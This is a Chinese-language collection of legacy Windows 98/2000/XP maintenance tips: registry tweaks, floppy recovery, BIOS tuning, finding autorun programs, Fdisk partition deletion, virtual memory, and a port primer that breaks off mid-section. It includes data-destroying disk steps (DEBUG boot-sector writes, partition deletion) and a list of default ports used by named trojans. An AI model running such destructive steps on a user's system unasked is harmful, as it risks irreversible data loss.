    Windows XP的系统还原所占用空间的最小值默认为200MB，这个数值可以通过注册表进行修改：在“开始→运行”中输入“Regedit”，打开“注册表编辑器”，进入“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore”，在右侧窗口中双击“DSMin”，输入其他数值，然后按F5键刷新即可。你也可以改变“DSMax”的大小以更改占用空间的最大值。

    四、锁住系统还原
    打开“注册表编辑器”，进入“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore”，将“DisableSR”的键值设为“1”即可，这时你会发现“系统还原”选项卡的内容已经不能再修改了。

    五、删除还原记录
    如果你只想删除还原记录而并不想关闭该功能，可通过“磁盘清理程序”来删除几乎所有的还原点(仅保留最近一次的还原点)。方法是：依次点击“开始→所有程序→附件→系统工具→磁盘清理”，然后选择相应驱动器即可。

    另外，用Windows优化大师清理垃圾文件时，默认的“垃圾文件”中的“_Restore”文件就是还原记录，不要删除，否则系统还原也就形同虚设了。

如何锁住桌面背景

    进入“开始→运行”，输入“regedit”打开注册表编辑器，找到分支“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies”，新建一个ActiveDeskop项，再在右侧窗口中新建一个名为NochangingWallPaper的DWORD值，并将它的值设为1，这样就可以彻底锁住你的桌面背景。解锁的方法也很简单：将新建的DWORD值修改为0即可。

如何挽救已受物理损坏的软盘中的文件

方法一：
    1.Windows法一
    进入Win98安全模式。进入A盘，这时一般能顺利进入A盘。将A盘中文件全部选中，单击工具栏上的“复制”按钮，再在C盘中建立一个新文件夹如AA，选中后单击“粘贴”即可将A盘中的文件拷入文件夹AA，从而恢复A盘中的文件(已受物理损坏簇中的文件除外)。

    2.Windows法二
    进入Win98安全模式。进入我的电脑，右键点A盘，点“复制软盘”，这时一般就能将受损软盘中的文件复制到一个新盘中！

    3.DEBUG法
    启动DEBUG后，把一张与受损软盘同类型的但完好无损且带有正确引导区的软盘插入驱动器A中，然后执行命令：

    L100 0 0 1(读A盘的引导区)

    从A驱动器中取出好盘，再插入欲修复的软盘，然后执行：

    W100 0 0 1(写引导区到A盘)

    Q(退出DEBUG)

    注：插入A驱动器中的好盘与坏盘容量必须相同。

方法二：
    1.用Windows中的磁盘扫描程序ScanDisk进行修复

    用ScanDisk对软盘扫描并进行修复前，设置“扫描类型”为“完全”方式，并选中“自动修复错误”。在“选项”中选择“系统及数据区”，并去掉“不修复隐藏文件及系统文件里面的损坏扇区”一项前的钩。这样修复后，就可以读出软盘上的数据了。

    2.对引导区损坏软盘的修复

    如果系统提示“TRACK 0 BAD,DISK UNUSABLE”，可以用HDCopy 95或Pctools 、BadCopy等工具软件，强行读取软盘上的数据，把它备份到硬盘上。再找一张新的空白软盘，格式化后，选择“Write”命令，将坏盘数据写入。这样就可以挽救其中的数据了。这种方法比较适合修复0磁道损坏或文件为文本格式的软盘。

    3.对ZIP或RAR压缩文件的抢救

    如果软盘上保存的是压缩文件，那么有时即使修复后读出数据，也不能正常解压缩了。这时可以在WinRAR或ACDSee中把它打开，这样就可以读取其中的文件了。还可以用WinRAR中的“修复档案文件”命令或ZIP修复大师等工具软件进行修复后，再完成解压。

如何移动收藏夹

    在Win 2000中各个用户的收藏夹被保存在自己特定的文件夹中，不过我们完全可以将它移动到其他地方让所有用户都可以看到，具体方法如下：

    打开注册表编辑器，进入主键［HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders］，然后将其中的“Favorites”的键值设置为其他路径，比如：C:\Favorites。
    重新启动後，“Favorites”收藏夹就出现在C盘下。

如何隐藏磁盘驱动器

    在[开始]-->[运行]-->键入[Regedit]-->[HKEY_CURRENT_USER]-->[Software]-->[Microsoft]-->[Windows]-->[CurrentVersion]-->[Policies]-->[Explorer]-->增加一个 DWORD 值[NoDrives]的数值数据请使用十进制及如下设定：隐藏 A 盘为[1]，隐藏 B 盘为 A 盘的一倍即[2]，隐藏 C 盘为 B 盘的一倍即[4]，如此类推，如全部隐藏则为[67108863]。
另在[HKEY_LOCAL_MACHINE]-->[Software]-->[Microsoft]-->[Windows]-->[CurrentVersion]-->[Policies]-->[Explorer]-->增加一个 DWORD 值，[NoDrives]的数值数据请使用十进制及如下设定：隐藏 A 盘为[1]，隐藏 B 盘为 A 盘的一倍即[2]，隐藏 C 盘为 B 盘的一倍即[4]，如此类推，如全部隐藏则为[67108863]。


电脑维修精华帖6

《一键清理系统垃圾》

电脑维修精华帖6

如何优化电脑系统的BIOS？

    1、在Standard CMOS Setup里没有连接IDE设备的端口的TYPE和MODE设为None。

    2、将CPU Internal Cache、External Cache设为Enabled，打开CPU一二级缓存。

    3、将System Boot Up speed设为High。使系统引导速度为高速。

    4、将Boot Sequence设为C，A:。

    5、将Floopy Drive Seek At Boot设为Disable。使启动时不检测软驱。

    6、将Above 1MB Memory Test设为Disabled。启动时不检测1MB以上的内存。

    7、将Boot Up Floppy seek设为Disabled。这样做可以使启动时不对软驱进行寻道操作。

    8、将Video BIOS Shadow设为Enabled。使显卡上的BIOS映射到内存中，提高显示速度。

    9、将System BIOS Shadow设为Enabled。使系统BIOS映射内存中，改善性能。

    10、将Video BIOS Cacheable设为Enable。使显卡上的BIOS映射到高速缓存。

    11、将System BIOS Cacheable设为Enbaled。使主板的BIOS映射到高速缓存。

    12、将Cache Timing设为Fastset。

    13、将SDRAM CAS Latency Time设为3。设置SDRAM的延迟时间。如果你的内存质量不是很好，设成3会使死机情况大大减少。

    14、采用VIA Apollo Pro系列主板芯片的BIOS有一项“DRAM CLOCK”将其值改为HCLK+33，这样你的内存就会工作在系统外频+33的频率下了，如果你的CPU为Celeron，那系统的性能提高将是极为明显的，如果你的内存不争气，你可将“DRAM CLOCK”的值设为“HOST CLK(系统外频)或“HOST-33”。这是因为Apollo Pro系列芯片有独特的内存异步技术。

如何找到自启动程序

    如果系统启动时自动加载的程序过多，会造成启动速度缓慢，而很多病毒或者木马也是在系统启动时自动加载的。所以了解怎样在Windows中查找自启动程序是非常重要的。

    一、在“启动”文件夹中寻找
    “启动”文件夹一般位于“系统盘符\Documents and Settings\用户名\开始菜单\程序\启动\”目录(Win 2000/XP)或“系统盘符\WINDOWS\Start Menu\Programs\启动\”目录。通过快捷方式的属性可以查出程序所在的位置。

    二、从自动批处理文件中寻找
    在Win 98中，Autoexec.bat和Winstart.bat文件中的程序在开机时自动执行；而在Win Me/2000/XP/2003中，这两个批处理文件默认不被执行。

    三、从系统配置文件中寻找
    在有些系统配置文件中也可以找到自启动程序的踪迹，如Config.sys、Win.ini、System.ini、Wininit.ini和Msdos.sys等。

    四、通过“系统配置实用程序”寻找
    在“开始→运行”中键入“msconfig.exe”启动“系统配置实用程序”，进入“启动”选项卡，即可查看随系统启动的程序名称和位置。
    注意：Win 2000本身没有Msconfig程序，可以从Win XP/2003中提取。

    五、从计划任务中寻找
    在“控制面板”中双击“任务计划”就可以查看是否有计划任务随系统一起启动。

    六、使用“系统信息”寻找
    进入“系统信息”主界面，依次展开分支“软件环境→启动程序”，就可以在右窗格中查看自启动程序名称和位置。

    七、使用“组策略”寻找
    在Win 2000/XP/2003中，在“开始→运行”中键入“gpedit.msc”，打开“组策略”，依次展开“用户配置→管理模板→系统→登录/注销”，双击“在用户登录时运行这些程序”，单击“显示”按钮，即可查看自启动程序。

    八、通过注册表寻找
    在注册表中，可以从下列键值中查找自启动程序的名称和位置。
    1.Userinit键
    位于“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit”。这个键允许指定用逗号分隔的多个程序。
    2.Explorer\Run键
    位于“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run”和“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run”。
    3.RunServicesOnce键
    RunServicesOnce键用来启动服务程序，在用户登录之前启动，具体位置是“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce”和“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce”。
    4.RunServices键
    RunServices键指定的程序在RunServicesOnce指定的程序之后运行，不过仍在用户登录之前。具体位置是：“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices”和“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\RunServices”。
    5.Run键
    Run是自动运行程序最常用的键，位置在“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”和“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”。
    6.Load键
    位于“HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows\load”。
    另外还有RunOnce、RunOnce\Setup等键。

    九、使用工具软件
    除了使用系统提供的工具以外，我们还可以求助于第三方软件，比如Windows优化大师、RegRun Gold等等。

如何直接移动应用程序

    一、可直接移动的应用程序
    对于部分应用程序(如Foxmail、QQ等)，我们可以将它们从一个文件夹直接移动到另一个文件夹，而不影响程序的运行，对于这样的应用程序，只要在“我的电脑”中将所在文件夹及其下所有文件移动到另一个文件夹下即可。

    二、不能直接移动的应用程序
    对于这类应用程序，之所以不能直接移动是因为安装该应用程序时，写入的注册表信息包含了程序的所在文件夹信息和应用程序的配置文件(通常是.ini文件)中包含了所在安装文件夹的信息。我们只要将对应的注册信息稍做修改就能顺利移动程序。假设我们要将杀毒软件KV3000从C:\KV3000移动到D:\KV3000，可以通过以下几个步骤解决：

    1.将应用程序所在文件夹连同其下所有文件移动到目标文件夹；

    2.运行注册表编辑程序Regedit.exe，通过“编辑→查找”菜单查找应用程序原安装文件夹(C:\Kv3000)，找到后，将其修改为目标文件夹(D:\Kv3000)，按F3键继续查找、修改，直至改完所有文件夹信息为止。也可以先将注册表全部导出，然后用写字板等编辑程序打开导出注册表文件，利用其“查找替换”功能，快速查找替换，保存修改结果，再导入注册表文件，这样更方便快捷。

    对于有些应用程序，可能还会有程序配置文件(一般是以.ini为文件扩展名)，该文件一般存放在安装文件夹下或C:\Windows文件夹下，有时该文件中会包含关于安装文件夹的信息，移动时记住也要将它修改过来。

    一般来说，经过以上几个步骤，就可以顺利地将应用程序搬家。

重新安装IE浏览器
    问：我使用的是Windows XP系统，系统自带的IE浏览器可能出现问题，现在我想重新安装IE，请问如何实现？

    答：打开注册表编辑器，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}，把右边的DWOD值IsInstalled从1改成0即可。如果需要重新安装OE，修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}中的上述同样内容就可以了。然后运行IE的安装程序，就可以重新安装了。

如何自动重启

    当Win 2000出现系统崩溃时，和Win 9X一样也会出现蓝屏，通常我们需要按下Reset键进行重启，不过，通过修改注册表我们可以设置自动重启。
    打开注册表编辑器，然后进入主键［HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl］，将其中的键值：“AutoReboot”设置为“1” 。
    这样当下次系统崩溃後，就会自动重启。

删除右键菜单的内容

首先单击“开始”菜单中的“运行”命令，打开“运行”对话框，在“打开”栏里输入“regedit”，然后按“确定”。然后在打开的“注册表编辑器”窗口中，打开 HKEY_CURRENT_USER\Software\ Microsoft\Internet Explorer\MenuExt主键，在该主键下会有许多的子主键，这些子主键的名称就是显示在右键菜单中的命令，只需找到显示命令的那条主键条目，单击鼠标右键，在弹出的快捷菜单中选择“删除”即可。

删除NTFS分区

1、用 Win 98启动盘启动系统，运行Fdisk，在Fdisk主菜单中选择第3项“Delete partition or Logical Drive”，在下一屏幕中选择第4项“Delete Non-DOS Partition”(删除非DOS分区)。
2、此时可以看到第一项中显示的是NTFS格式分区(Fdisk将它认成Non-DOS分区)，将它删除。
3、重启电脑，运行Fdisk，在Fdisk主菜单中选择第1项，把刚删除非DOS分区腾出的空间全部建成主DOS分区。按ESC退回后，再将刚建立的主DOS分区设置为活动分区。
4、格式化C盘后，即可重装Win 98。

    另外：如果你有Win 2000安装盘，还可以用Win 2000来删除NTFS分区。放入Win 2000安装盘，然后将系统设置为从光盘启动。启动后开始安装Win 2000。在选择安装的分区以及分区的格式时，选择是NTFS格式的分区，并更改分区格式为FAT32。更改完毕后，就可以重新启动系统，格式化C盘并安装Win 98。

删除屏幕保护和壁纸
    问：我使用的是Windows 98和Windows 2000双操作系统，里面有很多不满意的屏幕保护和壁纸。我想请教一下，用什么办法可以删除它们？

    答：Windows 98默认的屏幕保护都在C:\Windows下，文件后缀名是.scr，该目录下有一些壁纸，后缀名是.bmp。另外C:\Windows\Web\Wallpaper中也有部分壁纸。Windows 2000默认的屏幕保护都在C:\Winnt\System32\下，后缀名也是.scr。壁纸在C:\Winnt\Web\Wallpaper\和C:\Documents and Settings\账户名\My Documents\My Pictures\下。在这些路径下找到不满意的文件后即可删除。

删除启动选项中的选项
    问：在“开始菜单”中的“运行”项中输入“msconfig”之后选择“启动”选项卡，可以看到很多开机时自启动的软件名，可有些我永远也不想开机启动，又不想它出现在此选项卡中，请问能否将它们彻底删除？

    答：打开注册表编辑器，在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_Current_User\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_Current_User\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
以及“开始菜单→程序→启动”中查找你不需要的项并删除。另外也可以使用一些软件清理，例如超级兔子魔法设置等。

删除遗留的鼠标右键菜单项
    问：我在电脑中已经删除了Winamp，但是右击某些文件夹时，右键菜单中依然会有“用Winamp播放”等选项。请问怎样删除它们？

    答：打开注册表：找到HKEY_LOCAL_MACHINE\Software\CLASSES\Folder\shell\
HKEY_LOCAL_MACHINE\Software\CLASSES\Directory\shell\
两个键值，看看是否有相应的键值。并且在注册表查找“Winamp”等关键字，删除相应的键值即可。注意删除前清洗备份注册表！

删除“添加/删除程序”中的无效信息
    问：我使用的是Windows 98系统。由于我从硬盘上重装了两次系统，现在打开“控制面板”中的“添加/删除程序”时，过去删除过的程序名又显示在添加/删除列表框中了，而且无法删除。请问我该怎么办？

    答：系统中“添加/删除程序”里面的信息全部储存于注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall下面，打开注册表编辑器，找到不需要软件的卸载信息，删除对应的子项即可。

       要想清除这些顽固的软件名，可以打开注册表编辑器，进入HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion项，找到Uninstall项，从这里可以找到那些残留的软件列表，将之删除即可。假如“添加或删除程序”列表中的程序名仍然留在那里，可以在注册表编辑器中通过“编辑→查找”将与该程序有关的相应键值全部删除，不过在操作之前请备份注册表和重要的数据文件哟。

删除系统备份文件

开始→运行，*敲入：sfc.exe /purgecache 然后回车即可

删除信使服务
    问：我的电脑安装的是Windows 2000。最近在上网时老是会跳出一个窗口，标题栏上显示是信使服务，内容经常是些广告，用系统信息中的正在运行的任务查看是c:\windows\system32\mmc.exe这个程序在运行，但是删除掉这个程序不到一分钟，它又出来了，也就是一直删不掉，不知道这个问题怎么解决？

    答：这是Windows 2000里面自带的信使服务。打开“我的电脑”，点击“控制面板”，双击“管理工具”后点“服务”选项，找到Messenger，双击打开Messenger属性，把启动类型设置为手动，然后点击停止按钮，最后点击确定就可以关闭这个服务了。

删除虚拟光驱创建的盘符
    问：最近我安装了一个虚拟光驱软件，可当我卸载它以后，“我的电脑”里由它创建的光驱盘符图标却一直留在那里，怎么也去不掉，请问该怎么解决？

    答：你卸载时可能出了问题，如果系统是Windows 2000或Windows XP，你可以在“控制面板→系统→性能维护→设备管理器”中，在“CD-ROM”下，卸载掉你的虚拟光驱(一般名为xxx SCSI CD-ROM DEVICE)；如果系统是Windows 98，你可以在注册表中删除虚拟光盘图标，运行“regedit”找到HKEY_LOCAL_MACHINE\Enum\SCSI项，下面几个子键分别对应虚拟光盘和物理光驱，把对应虚拟光盘的子键(子键名含有SCSI字符)全部删除即可。

删除隐藏不活动的图标

我们在Windows XP中使用程序时，大部分程序在使用当中会有一个活动图标显示在任务栏“时间显示”的右侧（系统托盘区）。而在任务栏属性中的通知区域里，有一个叫“隐藏不活动的图标”选项，如果勾选了该项，那么系统就会自动记录曾经在系统托盘区显示过程序活动图标。点击该选项的“自定义”按钮，就会在“过去的项目”一栏中看到很多历史记录。
要删除这些内容也很简单，在“开始→运行”中键入regedit，打开注册表编辑器，展开“HKEY_CURRENT_US ER\Software\Microsoft\Windows\Curr entVersion\Explorer\TrayNotify”分支，其中“IconStreams”和“PastIconStream”项中分别存储着“当前项目”和“过去的项目”，将“TrayNotify”项删除，按Ctrl+Alt+Del组合键调出“Windows任务管理器”，单击进程选项卡，选择explorer.exe，结束进程。之后在“Windows任务管理器”中选“文件”→“新建任务”，在“创建新任务”中输入explorer.exe即可。

设置窗口自动刷新

    Windows的“资源管理器”或“我的电脑”是我们用来管理和修改电脑资源的两个主要工具。有时我们利用这两个工具对有关信息进行修改之后，系统不会自动将修改结果显示出来，必须按下F5键或点击菜单栏的“查看→刷新”，用手工刷新才能使修改生效，虽然步骤不多但还是显得有些麻烦。怎样才能使屏幕自动刷新呢？只要采用下面的方法对注册表简单修改一下就行：

    点击“开始→运行”，在对话框中输入“regedit”启动注册表编辑器，展开HKEY_LOCAL_MACHINE\System\Currentcontrolset\Control\Update分支。

    如果我们的操作系统是Windows 2000/XP，我们就能在该分支下看到一个名为“UpdateMode”的DWORD值，它就是用于设置是否自动刷新窗口显示的，系统默认值为1，表示手工刷新，该值若为0则表示自动刷新。我们只要用鼠标右键单击“UpdateMode”，在出现的快捷菜单中选“修改”并将其值修改为“0”即可；如果我们的操作系统是Windows 98/Me，则在展开的注册表分支下看到的“UpdateMode”是一个二进制值，系统默认值为01表示手工刷新，该值若为00则表示自动刷新，我们只要将其值修改为“00”即可。修改方法为，右键单击“UpdateMode”，在出现的快捷菜单中选“修改”后会出现“编辑二进制值”对话框，只要将该对话框中“数值数据”栏的“0000 01”的数值改为“0000 00”即可。

    这样我们就完成了对窗口自动刷新功能的控制，此后，我们利用“资源管理器”或“我的电脑”对系统相关信息进行的修改就能自动刷新显示。

设置开始菜单中的用户名

    一、恢复“开始”菜单中的“用户名”
    因为修改了注册表或者通过组策略进行了相关的设置，可以将Windows XP“开始”菜单中的“用户名”删除。如果遇到这种情况，我们可以通过下面的方法来恢复：

    在“开始→运行”中键入“Regedit”打开“注册表编辑器”，展开分支“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”，接着在右侧的窗口中将“NoUserNameInStartMenu”值(DWORD值)设为“0”或者删除它。注销或重新启动计算机后，在“开始”菜单中就可以看到“用户名”了。

    二、恢复“开始”菜单中的“我的图片”
    在Windows XP“开始”菜单的用户名旁边，一般会显示“我的图片”，但是在应用了某些设置后，该图片就会消失，我们可以通过下面的方法来恢复：

    单击“开始→控制面板”，双击“用户账户”，在出现的“用户账户”窗口中单击“更改用户登录或注销的方式”，接着选中“使用欢迎屏幕”复选框，最后单击“应用选项”按钮。在注销或重新启动计算机后，在“开始”菜单中就可以看到“我的图片”了。

    三、隐藏欢迎屏幕中的“用户名”
    为了防止别人通过欢迎屏幕中的用户名非法登录Windows XP，我们可以这样隐藏用户名：

    打开“注册表编辑器”，展开分支“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList”，接着在右侧的窗口中找到要隐藏的用户名(如果没有，就新建一个)，并将它的值(DWORD值)设为“0”(设为“1”就表示显示用户名)。注销或重新启动计算机后，欢迎屏幕中就会隐藏该“用户名”了。

设置任务管理器

    1.总体个性化设置
    ①显示方式
    选择“选项→前端显示”，可以让窗口总是在最前端显示；选择“选项→最小化时隐藏”，则任务管理器最小化时将显示在系统托盘内。
    ②显示速度
    选择“查看→更新速度”，可以对信息刷新速度进行设置，其中“高”表示一秒刷新两次；“标准”表示两秒刷新一次；“低”表示四秒刷新一次；“暂停”表示不自动刷新。
    2.选项卡的个性化设置
    ①“应用程序”选项卡
    在此选项卡中可以根据个人喜好设置视图查看方式，如“大图标”。
    ②“进程”选项卡
    在此选项卡中点击“查看→选择列”可以对要显示的列进行设置。单击列标题可以对显示的进程进行排序。右击任一个进程(“System Idle Process”除外)，选择“设置优先级”就可以设置进程的优先级。
    ③“性能”选项卡
    在该选项卡中点击“查看→显示内核时间”可以显示内核的运行情况(红线标示)；双击该选项卡就会进入详细视图，再次双击即可回复(该方法同样适于其他选项卡)。
    ④“联网”选项卡
    只有当系统安装有网卡时，才会显示“网络”选项卡。通过“选项→显示累积数据”可以显示所有通过网络适配器传递的数据；通过“查看→网卡历史记录”可以查看发送、接收以及总共的字节数。通过“查看→选择列”可以设置显示选项。
    ⑤“用户”选项卡
    只有在计算机启用了“快速用户切换”功能(通过“控制面板→用户账户→更改用户登录或注销的方式”中勾选“使用快速用户切换”)，并且作为工作组成员或独立的计算机时，才会出现“用户”选项卡，而对于作为网络域成员的计算机，“用户”选项卡不可用。我们可以通过“查看→选择列”设置要显示的信息。选中某个用户，通过“发送消息”可以给此用户发消息。

设置虚拟内存

    虚拟内存的概念是相对于物理内存而言的，当系统的物理内存空间入不敷出时，操作系统便会在硬盘上开辟一块磁盘空间当做内存使用，这部分硬盘空间就叫虚拟内存。Windows 98中采用Win386.swp文件的形式，而Windows 2000/XP则采用页面文件pagefile.sys的形式来管理虚拟内存。
    一、大小情况
    1.一般情况
    一般情况下，建议让Windows来自动分配管理虚拟内存，它能根据实际内存的使用情况，动态调整虚拟内存的大小。
    2.关于最小值
    Windows建议页面文件的最小值应该为当前系统物理内存容量再加上12MB，而对于物理内存容量小于256MB的用户，则建议将页面文件的最小值设得更大些：
    ①使用128MB或者更少内存的用户，建议将当前物理内存容量的1.75倍设置为页面文件的最小值。
    ②内存大小在128MB到256MB之间的用户，建议将当前物理内存容量的1.5倍设置为页面文件的最小值。
    3.关于最大值
    一般来说，页面文件的最大值设置得越大越好，建议设置为最小值的2到3倍。
    4.极端情况
    假如硬盘空间比较紧张，在设置页面文件时，只需保证它不小于物理内存的3/4即可。

    如果物理内存很大(大于512MB)，则可以将虚拟内存禁用。(上海 任亚维)
    5.根据不同的任务环境设置
    ①以3D游戏为主的环境
    3D游戏对CPU、显卡和内存要求都很高，如果物理内存小于256MB，建议把虚拟内存预设得大一点，这对提高游戏的稳定性和流畅性很有帮助。
    ②以播放视频为主的环境
    视频应用对硬盘空间的“胃口”很大，不过千万不要像在3D游戏环境中一样把虚拟内存设得很大，尤其是Windows XP的用户。因为Windows XP不会自动把不需要的空间释放掉，也就是说那个Pagefiles.sys文件会越来越大。如果你把虚拟内存和Windows XP放在同一分区，播放RM、ASF等视频流文件以后，系统经常会提示你虚拟内存设得太小或是磁盘空间不足。查看此时的页面文件，已经足有1GB大小了。所以建议经常欣赏视频文件的Windows XP用户，把初始数值设小一点，或者将虚拟内存转移到系统盘以外的分区。
    二、设置方法
    下面以在Windows XP下转移虚拟内存所在盘符为例介绍虚拟内存的设置方法：进入“打开→控制面板→系统”，选择“高级”选项卡，点击“性能”栏中的“设置”按钮，选择“高级”选项卡，点击“虚拟内存”栏内的“更改”按钮，即可进入“虚拟内存”窗口；在驱动器列表中选中系统盘符，然后勾选“无分页文件”选项，再单击“设置”按钮；接着点击其他分区，选择“自定义大小”选项，在“初始大小”和“最大值”中设定数值，然后单击“设置”按钮，最后点击“确定”按钮退出即可。

什么时信使服务

在Windows XP中，“信使服务”在服务列表中名称为“Messenger”，该服务用来传输客户端和服务器之间的Net Send和Alerter（报警器）服务消息。默认情况下，“信使服务”是打开的，所以当你的电脑连接到Internet上时，一些网站（包括厂商网站）可以通过该服务发送一些信息，在目标用户的计算机上会弹出一个名为“信使服务”的对话框。
    关闭方法：单击Windows“开始”菜单，单击“运行”。在“打开”框中，键入“net stop messenger”。单击“确定”按钮。
    命令“net stop messenger”的作用是停止“信使服务”，要启用“信使服务”，请使用“net start messenger”命令。

什么是 DirectX
    在 Windows 操作系统的体系构架中，在内核与硬件之间有一层抽象层，专门对硬件进行屏蔽抽象，所以用户不再被允许对硬件进行直接访问。这样做以后，大大地提高了操作系统的抗破坏性和抗干扰性，但这样以来，使硬件操作的效率大打折扣，许多新硬件的新特性无法直接使用，这对多媒体和游戏的发展显然是一种障碍。DirectX 是微软公司提供的一套优秀的应用程序编程接口(APIs)，用于联系应用程序和硬件自身，它对发展 Windows 平台下的多媒体应用程序和电脑游戏起到了关键的作用。DirectX 组件包括：DirectDraw、DirectSound、DirectPlay、Direct3D、DirectInput、DirectSetup、AutoPlay 等。
    总之，DirectX 的主要好处有两个：为软件开发者提供与硬件的无关性；为硬件开发提供策略。

hosts文件是Windows系统中一个负责IP地址与域名快递解析的文件，以ASCLL格式保存。计算机在键入域名（比如www.baidu.com）的时候，首先会去看看hosts文件汇总有没有关于此域名IP地址的记录。如果有，就直接登陆该网站；如果没有再查询DNS服务器。hosts在Windows98中是hosts.sam文件，在Windows2000/XP中则就是hosts文件，没有拓展名。

什么是POP3
    POP 即为 Post Office Protocol 的简称，是一种电子邮局传输协议，而 POP3 是它的第三个版本，是规定了怎样将个人计算机连接到 Internet 的邮件服务器和下载电子邮件的电子协议。它是 Internet 电子邮件的第一个离线协议标准。简单点说，POP3 就是一个简单而实用的邮件信息传输协议。

什么是 SMTP?
    SMTP 的全称是“Simple Mail Transfer Protocol”，即简单邮件传输协议。它是一组用于从源地址到目的地址传输邮件的规范，通过它来控制邮件的中转方式。SMTP 协议属于 TCP/IP 协议簇，它帮助每台计算机在发送或中转信件时找到下一个目的地。SMTP 服务器就是遵循 SMTP 协议的发送邮件服务器。

什么是Smartdrv程序

    Smartdrv.exe这个文件主要作用是为磁盘文件读写增加高速缓存。内存的读写速度比磁盘高得多，如果将内存作为磁盘读写的高速缓存可以有效提高系统运行效率。Smartdrv.exe这个文件在Windows各个版本的安装光盘中或是硬盘上的Windows/command/里都有，只有几十KB，把这个文件复制到软盘下，启动系统后直接运行这个程序(可以不加参数，该程序会自动根据内存大小分配适当的内存空间作为高速缓存)，再安装Windows XP即可。另外提醒大家，这个程序在安装完Windows后，不要运行，否则Windows可用内存将减少。

丢包

数据在INTERNET上的传输方式数据在INTERNET上是以数据包为单位传输的，每包nK，不多也不少。这就是说，不管你的网有多好，你的数据都不会是以线性（就象打电话一样）传输的，中间总是有空洞的。数据包的传输，不可能百分之百的能够完成，因为种种原因，总会有一定的损失。碰到这种情况，INTERNET会自动的让双方的电脑根据协议来补包。如果你的线路好，速度快，包的损失会非常小，补包的工作也相对较易完成，因此可以近似的将你的数据看做是无损传输。但是，如果你的线路较差（如用猫），数据的损失量就会非常大，补包工作也不可能百分之百完成。在这种情况下，数据的传输就会出现空洞，造成丢包。

端口概念
    在网络技术中，端口（Port）大致有两种意思：一是物理意义上的端口，比如，ADSL Modem、集线器、交换机、路由器用于连接其他网络设备的接口，如RJ-45端口、SC端口等等。二是逻辑意义上的端口，一般是指TCP/IP协议中的端口，端口号的范围从0到65535，比如用于浏览网页服务的80端口，用于FTP服务的21端口等等。我们这里将要介绍的就是逻辑意义上的端口。

查看端口
    在Windows 2000/XP/Server 2003中要查看端口，可以使用Netstat命令：
    依次点击“开始→运行”，键入“cmd”并回车，打开命令提示符窗口。在命令提示符状态下键入“netstat -a -n”，按下回车键后就可以看到以数字形式显示的TCP和UDP连接的端口号及状态。

关闭/开启端口
    在介绍各种端口的作用前，这里先介绍一下在Windows中如何关闭/打开端口，因为默认的情况下，有很多不安全的或没有什么用的端口是开启的，比如Telnet服务的23端口、FTP服务的21端口、SMTP服务的25端口、RPC服务的135端口等等。为了保证系统的安全性，我们可以通过下面的方法来关闭/开启端口。

关闭端口
    比如在Windows 2000/XP中关闭SMTP服务的25端口，可以这样做：首先打开“控制面板”，双击“管理工具”，再双击“服务”。接着在打开的服务窗口中找到并双击“Simple Mail Transfer Protocol （SMTP）”服务，单击“停止”按钮来停止该服务，然后在“启动类型”中选择“已禁用”，最后单击“确定”按钮即可。这样，关闭了SMTP服务就相当于关闭了对应的端口。

开启端口
    如果要开启该端口只要先在“启动类型”选择“自动”，单击“确定”按钮，再打开该服务，在“服务状态”中单击“启动”按钮即可启用该端口，最后，单击“确定”按钮即可。
提示：在Windows 98中没有“服务”选项，你可以使用防火墙的规则设置功能来关闭/开启端口。
端口分类

逻辑意义上的端口有多种分类标准，下面将介绍两种常见的分类：

1. 按端口号分布划分

（1）知名端口（Well-Known Ports）
    知名端口即众所周知的端口号，范围从0到1023，这些端口号一般固定分配给一些服务。比如21端口分配给FTP服务，25端口分配给SMTP（简单邮件传输协议）服务，80端口分配给HTTP服务，135端口分配给RPC（远程过程调用）服务等等。

（2）动态端口（Dynamic Ports）
    动态端口的范围从1024到65535，这些端口号一般不固定分配给某个服务，也就是说许多服务都可以使用这些端口。只要运行的程序向系统提出访问网络的申请，那么系统就可以从这些端口号中分配一个供该程序使用。比如1024端口就是分配给第一个向系统发出申请的程序。在关闭程序进程后，就会释放所占用的端口号。
    不过，动态端口也常常被病毒木马程序所利用，如冰河默认连接端口是7626、WAY 2.4是8011、Netspy 3.0是7306、YAI病毒是1024等等。

2. 按协议类型划分
    按协议类型划分，可以分为TCP、UDP、IP和ICMP（Internet控制消息协议）等端口。下面主要介绍TCP和UDP端口：

（1）TCP端口
